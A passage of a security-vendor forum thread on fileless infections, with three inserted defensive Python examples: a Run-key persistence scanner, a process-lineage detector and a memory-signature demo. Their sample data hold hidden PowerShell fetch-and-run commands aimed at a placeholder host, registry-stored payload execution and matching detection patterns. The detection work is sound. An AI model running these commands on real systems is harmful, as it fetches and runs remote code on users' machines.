hjlbx

Does Behavior Blocker Protect Against File-less Infections?


Behavior Blocker, aka BB, is used to prevent zero-day threats from being executed and installed on your computer. Behavior Blocker can also be used as banking protection. But to your question: what do you mean by file-less infection? Do you mean a legitimate file or an adware file?


We recently started updating both our scan engine as well as the behavior blocker to account for file-less infections. At the moment they won't be detected properly, unless they eventually try to establish persistence on a user's system.

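The post above says a fileless infection is only caught once it tries to establish persistence. The following is an added example of what that persistence check can look like; it is not Emsisoft's code and does not describe how their product works. It assumes a `.reg` export of a Run key (the format `reg export` writes), parses it, and flags values that relaunch a script host with a payload stored in the registry value itself rather than in a file on disk. The host list, the indicator patterns and the sample export are all constructed for the example.

```python
"""Persistence-artifact check for fileless malware: added example, not Emsisoft code.
Assumes a .reg export of a Run key (as `reg export` writes it); flags entries that
re-launch a script host with a payload that lives in the registry value itself."""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Hosts fileless loaders commonly hide behind; the set is an assumption.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                "rundll32.exe", "regsvr32.exe", "cmd.exe"}
SUSPICIOUS_PATTERNS = [
    (r"-w(?:indowstyle)?\s+hid", "hidden window"),
    (r"\biex\b|invoke-expression", "Invoke-Expression"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", "fetches code at run time"),
    (r"get-itemproperty|\bgp\b.*hk(?:cu|lm)", "reads payload from the registry"),
]
# -e / -ec / -en / -enc / -EncodedCommand followed by base64 of a UTF-16LE script
ENC_RE = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
@dataclass
class RunEntry:
    key: str
    name: str
    command: str

@dataclass
class Finding:
    entry: RunEntry
    reasons: List[str] = field(default_factory=list)
    decoded: Optional[str] = None

def parse_reg_export(text: str) -> List[RunEntry]:
    """Minimal .reg parser: [key] headers and "name"="string" values only."""
    entries, key = [], None
    unescape = lambda s: re.sub(r"\\(.)", r"\1", s)      # \\ -> \  and  \" -> "
    for raw in text.splitlines():
        line = raw.strip()
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            key = m.group(1)
            continue
        m = re.fullmatch(r'"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"', line)
        if m and key:
            entries.append(RunEntry(key, unescape(m.group(1)), unescape(m.group(2))))
    return entries

def executable_of(command: str) -> str:
    cmd = command.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        exe = cmd[1:end] if end > 0 else cmd[1:]
    else:
        exe = cmd.split(None, 1)[0]
    exe = exe.rsplit("\\", 1)[-1].lower()
    return exe if exe.endswith(".exe") else exe + ".exe"

def decode_encoded_command(command: str) -> Optional[str]:
    m = ENC_RE.search(command)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def assess(entry: RunEntry) -> Finding:
    finding = Finding(entry)
    exe = executable_of(entry.command)
    if exe not in SCRIPT_HOSTS:
        return finding
    finding.reasons.append(f"script host {exe} in {entry.key}")
    text = entry.command
    finding.decoded = decode_encoded_command(text)
    if finding.decoded:
        finding.reasons.append("encoded command")
        text += " " + finding.decoded        # match the indicators inside the decoded script too
    for pattern, why in SUSPICIOUS_PATTERNS:
        if re.search(pattern, text, re.I):
            finding.reasons.append(why)
    return finding

def scan(reg_text: str) -> List[Finding]:
    # A bare script host is not enough (cmd.exe in Run is sometimes legitimate):
    # require the host plus at least one payload-style indicator.
    return [f for f in map(assess, parse_reg_export(reg_text)) if len(f.reasons) >= 2]

# Constructed sample, not from a real system: 'Updater' and 'Stage' show the
# fileless pattern, no dropped binary, the payload lives in the Run value.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')".encode("utf-16le")
).decode("ascii")
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Updater"="powershell.exe -NoP -W Hidden -Enc {ENC}"
"Stage"="powershell -w hidden -c \"iex (gp 'HKCU:\\Software\\Test').Payload\""
'''.replace("{ENC}", _ENCODED)
```

Running `scan(SAMPLE_REG)` returns findings for `Updater` (encoded command decoded to a `DownloadString` one-liner) and `Stage` (hidden window, `iex`, payload read from `HKCU`), and nothing for the OneDrive entry. This is the cheap half of the problem: the artifact only exists after the payload has decided to survive a reboot, which is the limitation the post describes.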

Hello Fabian,

I know you and other staff are hard at work making improvements... always...

It inspires confidence...

As I already have an "Anti-Exploit" solution installed, my system should be reasonably well protected.

I just wanted to ask simply because if EIS already provided such protection then there is no need to have additional solutions installed; keep it simple...

Many Thanks,

hjlbx


The best "anti-exploit" you can buy, in my opinion, is Secunia PSI or one of the many other tools that help you keep track of which applications you have installed and whether or not there are updates available for them. If there is no vulnerable software version to begin with, there is no need for any kind of anti-exploit.


Actually there is not always a patch for vulnerable software so keeping your software up to date does not guarantee you are safe from exploits. Exploits can go unknown for some time before being patched. Even when an exploit is discovered it is not usually patched right away. Sometimes an exploit is not patched for months after being discovered.


Actually there is not always a patch for vulnerable software so keeping your software up to date does not guarantee you are safe from exploits. Exploits can go unknown for some time before being patched. Even when an exploit is discovered it is not usually patched right away. Sometimes an exploit is not patched for months after being discovered.

If you are important enough that someone would be willing to spend tens of thousands of US dollars on a reliable zero-day exploit to get your system infected, this naturally won't help you. However, that simply isn't a case that any normal home users should be concerned about.


Hello cutting_edgetech,

These are the measures I take to minimize any potential "Exploit":

1.  Use alternatives to Adobe products (Flash, Reader, Acrobat, ...)

2.  Use alternatives to Microsoft products (Word, Excel, Outlook, Windows Media Player, ...)  Note:  IE11 is the exception here as EAM/EIS provide protections

3.  Do not install/uninstall Oracle's Java or, especially, Java Runtime Environment (JRE)

4.  Use update software such as Secunia PSI and/or FileHippo updater

In general, malware succeeds by "exploiting" the greatest number of systems possible.  Consequently, malware artists will always target the vulnerabilities of the most widely installed applications.  So I just don't use them...

In my experience EAM/EIS offer a very high level of protection...

hjlbx

Guest Tempus

If you are important enough that someone would be willing to spend tens of thousands of US dollars on a reliable zero-day exploit to get your system infected, this naturally won't help you. However, that simply isn't a case that any normal home users should be concerned about.

 

Exploits are a reality and a threat for normal users as well. Botnets can be installed through exploits on a non-updated PC. You don't have to be a million-dollar company, but it will probably help, of course. Let's take the Caphaw Trojan, which gave the opportunity to control a PC and was installed on your PC by clicking on third-party YouTube ads, so here the target was the so-called normal user base. My point is that it is true when cutting_edgetech writes "Exploits can go unknown for some time before being patched" and "Sometimes an exploit is not patched for months after being discovered"; for a normal user it can be weeks/months, and thereby leave a window of opportunity. Is it something that normal users should be concerned about? I don't think that a normal user has to lie awake at night, but awareness and education about the importance of an overall update of your software profile/programs to minimize the attack surface for exploits is important, even for a normal user. Btw, the more sophisticated coded malware/exploit tools have a tendency to become accessible to cyber criminals at a much lower price over time. If I have misunderstood anything then please let me know =)


If I have misunderstood anything then please let me know =).

Yes, you missed the entire point. Of course exploits are a topic for home users. But these types of exploits are publicly known, meaning the vendors are aware of them and patches are available that you can install to no longer be vulnerable. Cutting_edgetech was referring to "unknown" exploits that only a small number of people (usually only the person who found it), but not the vendor, have access to, so they can't be patched by the vendor and therefore can't be dodged by using the latest version of the vulnerable software. These kinds of exploits are highly valuable. Depending on the type of exploit and how reliable it is, we are talking about six figures on the "black market" here. Nobody will spend that kind of money to get into home users' PCs because the return on investment would be abysmal unless you use it on hundreds of thousands of PCs, burning the exploit in the process.

Guest Tempus

Yes, you missed the entire point. Of course exploits are a topic for home users. But these types of exploits are publicly known, meaning the vendors are aware of them and patches are available that you can install to no longer be vulnerable. Cutting_edgetech was referring to "unknown" exploits that only a small number of people (usually only the person who found it) but not the vendor have access to, so they can't be patched by the vendor and therefore can't be dodged by using the latest version of the vulnerable software. These kinds of exploits are highly valuable. Depending on the type of exploit and how reliable it is, we are talking about six figures on the "black market" here. Nobody will spend that kind of money to get into home users' PCs because the return of investment would be abysmal unless you use it on hundreds of thousands of PCs burning the exploit in the process.

Okay, my bad. I understand your argumentation much better now, and it makes sense... definitely. But even with publicly known exploits there will, very often, be a window of opportunity before a patch is released by the vendor, leaving you potentially vulnerable.


But even with publicly known exploits there will, very often, be a window of opportunity before a patch is released by the vendor, leaving you potentially vulnerable.

In theory maybe. Realistically exploits aren't an issue for home users unless there are large campaigns going on. Most attackers don't have the resources to actually take a description of an exploit or maybe even a file exploiting a vulnerability that was leaked from a targeted attack and weaponize it for their purposes. So they too rely on readily available tools like exploit kits for example. Adoption of new exploits into such readily available tools is a lot slower than most vendors need to fix a high risk vulnerability. In fact, a lot of the exploits that made headlines this year haven't made it into exploit kits yet.

 

One kind of vulnerability that exploit kit makers tend to adopt a lot faster than others is Flash vulnerabilities. CVE-2014-0569 was adopted in a particularly timely manner this year. But even there the patch was already available for a week before the first drop sites started to exploit it.

Guest Tempus

Thanks Fabian for your opinion(s) regarding "home users and exploits". As said, your argumentation makes sense... and is appreciated.

Fabian, what is your take on browser extensions and exploits? I mean many or some browser extensions from third parties are or can be very buggy, are often not coded with security in mind, and very often they run with the user's full privileges.


Fabian, what is your take on browser extensions and exploits? I mean many or some browser extensions from third parties are or can be very buggy, are often not coded with security in mind, and very often they run with the user's full privileges.

Depends on what type of extensions you are talking about. Do you mean binary extensions as in "plugins" like Java or Flash or are you talking about browser addons like Adblock? It also heavily depends on the browser you are using and what you are doing as a home user. If you don't use Netflix, chances are you will never need Silverlight. If you don't play Minecraft, you will never need Java. You get the idea.


In a way this all makes me chuckle.   First, for the typical home user I agree with Fabian's assessment 1000%.  I run other security software because I am not a typical home user.  I run my business on my computers, keep no paper records at all, and have client financial information on these computers.  Since my business is already a trust business, I feel obligated to close any and all holes, even if the probability of attack is near zero.   Also, a bit of research can be enlightening.  Two examples:

1.  When the Bromium folks published their "work" they claimed to show how kernel exploits could undermine sandboxes, and almost every piece of software out there except of course theirs.  And of course it's only sold to businesses.  Well, this kicked off a firestorm of OMGs, what-do-I-do-now stuff.  Finally I did a bit of research on kernel exploits.  Turned out better than 85% of the hits were Bromium posts, then a bunch on kernel exploits in Linux, and finally a few pointing out how hard it was to write kernel exploits.  I now consider it marketing.

2.  Then there was the Duqu episode, and again people were wringing their hands.  Once I realized it came via Word docs, I yawned.  EIS, plus most of my other software, would have stopped it.  But then a bit of research pointed out it only targeted command and control facilities, and all but two of the attacks were in one country.  Would the typical user of EIS/EAM be a target?  I don't think so, so Fabian's conclusions are spot on.

Pete

Guest Tempus

You get the idea.

Got it.... I didn't mean binary extensions, because that was more or less discussed in the previous posts. I was curious to hear your opinion about the huge number of browser add-ons for browsers such as Firefox and Chrome (personally I use IE11). These browser extensions can be, in my opinion, very buggy; they are not patched so often, not coded with security in mind, and can have doubtful and obscured collection of user information, etc. Are those kinds of browser add-ons a concern regarding exploits? I guess exploitation can be on different levels. (Btw, hope you had a great Christmas.)   =)


With very few exceptions those add-ons are subject to the same kind of sandboxing that all JavaScript and websites are. So they are just as prone or not prone to exploits as the website rendering is. Of course a browser add-on can act maliciously on purpose within the add-on model that the browser provides. It is completely feasible to log form data using a malicious browser add-on, for example, or to inject all kinds of nasty code inside any website you want as a browser add-on. But that won't happen by accident.

Guest Tempus

Thanks Fabian, I actually think I have become a bit wiser.... as always, thanks for your time spent answering my posts in this thread..... :)


Hello Fabian,

will file-less infections be detected properly now with Emsi 10?

Java, Windows and mostly Flash bugs and exploits are being discovered and implemented in kits ever faster and more often... Tempus was not too wrong, in my opinion.

We hope Emsi will keep doing the great job they have done until now and keep us safe also from unknown malware.

Thank you and good work!


Fabian,

thank you.

1. What additional software would you recommend to properly detect file-less infections?

2. On http://support.emsisoft.com/topic/15469-oas-physical-memory-access-hips-component-question/

you said OA in general does prevent applications from writing into other processes.

Just to be sure, do Emsi AM and/or Emsi IS offer this feature?

Thank you


Yes, the behavior blocker detects and prevents code injection. EMET works fine for me with the default configuration. Other tools may work as well, but we don't test with them and I don't use them.


..not sure I understood your reply correctly..

Is EMET a good program to add protection against file-less infections, or doesn't it cover this kind of infection?

Thank you


There is no tool that covers fileless infections. The point of EMET and other exploit mitigation tools is to make it harder for security vulnerabilities within applications to be exploited so it is more difficult for fileless infections to enter your system. The best approach is obviously to keep your applications up-to-date and reduce your attack surface as much as possible, by removing things like Java, Adobe Acrobat Reader or Flash from your system, or at least switch them into "click to play" mode so they aren't loaded automatically but only if you really want to. But if you can't do that for whatever reason, you can consider tools like EMET.


Fabian, AppGuard does provide protection against fileless infections to a degree, in that it has what they call Memory Guard.  It prevents an application from reading or writing to another application's memory.  I've tested it and it does work.


That isn't a protection from fileless infections either. EAM does that as well (code injection protection). It helps mitigate fileless infections; it does not stop them.


Fabian, thank you for the clear answer!

Peter, thank you for the input... I saw your point/the discussion on Wilders; that's why I checked here whether Emsi AM/IS protects from this threat or if additional tools are needed/suggested.

I hope Emsi will find a way to protect from file-less infections one day!


Fabian, thank you for the clear answer!

Peter, thank you for the input... I saw your point/the discussion on Wilders; that's why I checked here whether Emsi AM/IS protects from this threat or if additional tools are needed/suggested.

I hope Emsi will find a way to protect from file-less infections one day!

Hi pallino

I think you can rest easy.  If you are on Wilders you have an idea of my setup.   I've done quite a bit of playing with malware that people try and foist on me, and inevitably the first one to catch it is EIS.   You are in good hands with EMSISOFT!!

Pete


Hi pallino

I think you can rest easy. If you are on Wilders you have an idea of my setup. I've done quite a bit of playing with malware that people try and foist on me and inevitably the first one to catch it is EIS. You are in good hands, with EMSISOFT!!

Pete

Thank you Pete!

I'm still reading on Wilders; I have sooo many pages open it will take me some days to read them all! :-)

I still didn't get to the part where I see your setup, on what page is it? Thank you!

I'll keep the anti-exploit with Emsi to cover more entry points and "sleep well". :-)

It's good to hear I'm in good hands! :-)


Fabian,

what did you mean before with fileless infections "won't be detected properly"?

When does Emsi detect them and when not?

E.g., if a "new"/unknown Bedep variant is dropped, will BB be able to detect it, or can it only be detected through generic signatures/heuristics?

Thank you for your help and clarification !


I don't think I can be clearer than I have already been: We don't handle fileless infections at all in realtime at the moment. There is nothing more to clarify imho.


No, we don't. We will see the actions taking place, but since they are performed by a trusted process (like the browser that is being exploited) we will allow them to go through without notice.

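The post above explains the blind spot: the malicious actions are performed by a trusted process (the exploited browser), so a per-process trust decision lets them through. A detection that does not trust the process but looks at where it came from is shown below as an added example; it is not Emsisoft's code and does not describe how their behavior blocker works. It takes process-creation events (the shape Sysmon event 1 or any EDR gives you), rebuilds the parent chain, and alerts when a script host's ancestry leads back to a browser or document reader within a few hops. The event list, process sets and paths are constructed for the example.

```python
"""Parent/child lineage check for script hosts spawned, directly or via cmd.exe,
from an exploitable 'trusted' process. Added example, not Emsisoft code; the
events are constructed and stand in for real process-creation telemetry."""
from dataclasses import dataclass
from typing import Dict, List

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str       # full path, as a process-creation event logs it
    cmdline: str

@dataclass
class Alert:
    pid: int
    chain: List[str]  # basenames: the flagged process first, the exploited ancestor last
    cmdline: str

# Both sets are assumptions for the example; tune them to the estate you monitor.
EXPLOIT_TARGETS = {"chrome.exe", "firefox.exe", "iexplore.exe", "msedge.exe",
                   "winword.exe", "excel.exe", "outlook.exe", "acrord32.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}

# Constructed sample: a browser renderer (normal), a browser that spawns
# cmd -> powershell (the exploit case), Word spawning its print helper (normal),
# and a user starting PowerShell from Explorer (normal).
SAMPLE_EVENTS = [
    ProcEvent(100, 1,   r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Google\Chrome\Application\chrome.exe", "chrome.exe"),
    ProcEvent(201, 200, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              "chrome.exe --type=renderer"),
    ProcEvent(300, 200, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c powershell -w hidden -nop -c "iex (gp HKCU:\Software\Test).Payload"'),
    ProcEvent(301, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell -w hidden -nop -c "iex (gp HKCU:\Software\Test).Payload"'),
    ProcEvent(400, 100, r"C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE",
              "WINWORD.EXE /n"),
    ProcEvent(401, 400, r"C:\Windows\splwow64.exe", "splwow64.exe 12288"),
    ProcEvent(500, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe"),
]

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def index_by_pid(events: List[ProcEvent]) -> Dict[int, ProcEvent]:
    # PIDs are reused on a live system; real telemetry should key on a process GUID.
    # Assumed unique within this constructed sample.
    return {e.pid: e for e in events}

def ancestry(procs: Dict[int, ProcEvent], pid: int, max_depth: int = 4) -> List[ProcEvent]:
    """The process itself followed by up to max_depth-1 ancestors that we have events for."""
    chain, cur = [], procs.get(pid)
    while cur is not None and len(chain) < max_depth:
        chain.append(cur)
        cur = procs.get(cur.ppid)
    return chain

def detect(events: List[ProcEvent], max_depth: int = 4) -> List[Alert]:
    """Alert on every script host with an exploit target in its ancestry.
    Depth matters: browser -> cmd.exe -> powershell.exe needs at least 3 levels."""
    procs, alerts = index_by_pid(events), []
    for e in events:
        if basename(e.image) not in SCRIPT_HOSTS:
            continue
        chain = ancestry(procs, e.pid, max_depth)
        for i, ancestor in enumerate(chain[1:], start=1):
            if basename(ancestor.image) in EXPLOIT_TARGETS:
                alerts.append(Alert(e.pid, [basename(p.image) for p in chain[:i + 1]], e.cmdline))
                break
    return alerts

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"pid {a.pid}: {' <- '.join(a.chain)} :: {a.cmdline}")
```

`detect(SAMPLE_EVENTS)` raises two alerts, for `cmd.exe <- chrome.exe` and `powershell.exe <- cmd.exe <- chrome.exe`, and stays quiet for the renderer, the Word print helper and the user-launched PowerShell. With `max_depth=2` the second alert disappears, which is the usual way such a rule gets evaded: one more benign hop than the rule looks back. The rule catches the spawn, not the in-memory payload; code that stays inside the browser process never appears here at all.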

Bedep can stay undetected in memory, yes. A memory scan won't detect it, as a memory scan essentially scans the loaded files. Since there is no Bedep file, there is nothing for us to scan.


Last question. :-)

Isn't it possible to add a scan of all the content of memory, independent of whether it's used by loaded files or not?

If not, why?

Thank you


It is possible, but our signatures don't support it. Scanning memory has to account for relocations and other things taking place that change the memory content. I wouldn't rule it out entirely for the future though.

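The post above gives the reason file signatures do not carry over to raw memory: relocation changes the bytes. The following added example makes that concrete; it is not Emsisoft's code and says nothing about their signature format. A toy image with two absolute pointers stands in for a PE and its `.reloc` directory (both constructed here): the loader rewrites the pointers for the base it actually uses, so a signature taken from the file no longer matches in memory. Two ways a scanner can cope are shown: wildcarding the relocation slots so the signature is base-independent, or rebasing the memory copy back to the preferred base before applying the file signature. The second needs the in-memory base, which a module list gives you for a loaded DLL but not for injected or fileless code.

```python
"""Why a file signature misses the same code in memory, and two ways a scanner
copes. Added example, not Emsisoft code; the 'image' and relocation table are
a toy constructed here, standing in for a PE and its .reloc directory."""
import struct
from typing import List

PREFERRED_BASE = 0x400000   # base the file was linked for
LOADED_BASE = 0x1F0000      # where the loader (or an injector) actually put it
RELOCS = [4, 10]            # image offsets of the two absolute 32-bit pointers

def build_image(base: int) -> bytes:
    """Toy x86 image: two instructions carry absolute addresses, so the bytes
    differ depending on the base the image is built (or relocated) for."""
    code = b"\x55\x8b\xec"                                # push ebp; mov ebp,esp
    code += b"\x68" + struct.pack("<I", base + 0x40)      # push offset marker_string
    code += b"\xff\x15" + struct.pack("<I", base + 0x30)  # call [import_slot]
    code += b"\x33\xc0\x5d\xc3"                           # xor eax,eax; pop ebp; ret
    img = code.ljust(0x30, b"\x90") + b"\x00" * 0x10      # 0x30: import slot (zero here)
    return img + b"fileless marker\x00"                   # 0x40: string

def relocate(image: bytes, relocs: List[int], old_base: int, new_base: int) -> bytes:
    """What the loader does with the .reloc table: add the base delta to every
    absolute pointer. A scanner can run it in reverse to normalise a memory copy."""
    out, delta = bytearray(image), new_base - old_base
    for off in relocs:
        (val,) = struct.unpack_from("<I", out, off)
        struct.pack_into("<I", out, off, (val + delta) & 0xFFFFFFFF)
    return bytes(out)

def naive_find(haystack: bytes, sig: bytes) -> int:
    """Plain file-style signature match; -1 when absent."""
    return haystack.find(sig)

def mask_for(sig_offset: int, sig_len: int, relocs: List[int], ptr_size: int = 4) -> bytes:
    """Wildcard (0x00) every byte of the signature window that sits in a relocation slot."""
    mask = bytearray(b"\xff" * sig_len)
    for off in relocs:
        for i in range(off, off + ptr_size):
            if sig_offset <= i < sig_offset + sig_len:
                mask[i - sig_offset] = 0
    return bytes(mask)

def masked_find(haystack: bytes, sig: bytes, mask: bytes) -> int:
    """Byte-wise search that ignores masked (relocated) positions; -1 when absent."""
    for off in range(len(haystack) - len(sig) + 1):
        window = haystack[off:off + len(sig)]
        if all((h & m) == (s & m) for h, s, m in zip(window, sig, mask)):
            return off
    return -1

DISK_IMAGE = build_image(PREFERRED_BASE)                               # what the file scanner sees
MEM_IMAGE = relocate(DISK_IMAGE, RELOCS, PREFERRED_BASE, LOADED_BASE)  # what sits in RAM
SIG = DISK_IMAGE[:18]            # file-derived signature over the code, both pointers included
SIG_MASK = mask_for(0, len(SIG), RELOCS)

def rebased_find(mem: bytes, loaded_base: int) -> int:
    """Alternative: undo the relocation first, then use the plain file signature.
    Requires knowing loaded_base, which fileless code does not advertise."""
    return naive_find(relocate(mem, RELOCS, loaded_base, PREFERRED_BASE), SIG)

if __name__ == "__main__":
    print("naive file signature in memory :", naive_find(MEM_IMAGE, SIG))          # -1
    print("relocation-masked signature    :", masked_find(MEM_IMAGE, SIG, SIG_MASK))  # 0
    print("rebase memory, then file sig   :", rebased_find(MEM_IMAGE, LOADED_BASE))   # 0
```

The masked approach is the one that works without knowing where the code landed, at the price of a weaker signature (eight of eighteen bytes are wildcards here) and a per-signature mask that has to be derived from the relocation table at signature-creation time. Real images add further differences the example leaves out, such as import slots filled by the loader and sections the process has written to, which is why a memory signature set is a separate effort from a file signature set.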

Hello Fabian,

how does Emsisoft now handle fileless infections?

Did something change in Emsi 11 and/or will it in the upcoming 12, or is it still protecting the customer through its anti-exploit and BB protecting from process injection?

Can Emsi now scan all the content of memory, independent of whether it's used by loaded files or not?

thank you


Since Fabian hasn't answered, I'll jump in and say that I'm fairly certain we added handling for fileless infections. Fabian will know more, of course, so you may have to wait for him to comment to get more information than that.


Thank you Arthur.

Can you please check with Fabian

how Emsisoft now handles fileless infections?

Did something change in Emsi 11 and/or will it in the upcoming 12, or is it still protecting the customer through its anti-exploit and BB protecting from process injection?

Can Emsi now scan all the content of memory, independent of whether it's used by loaded files or not?

thank you

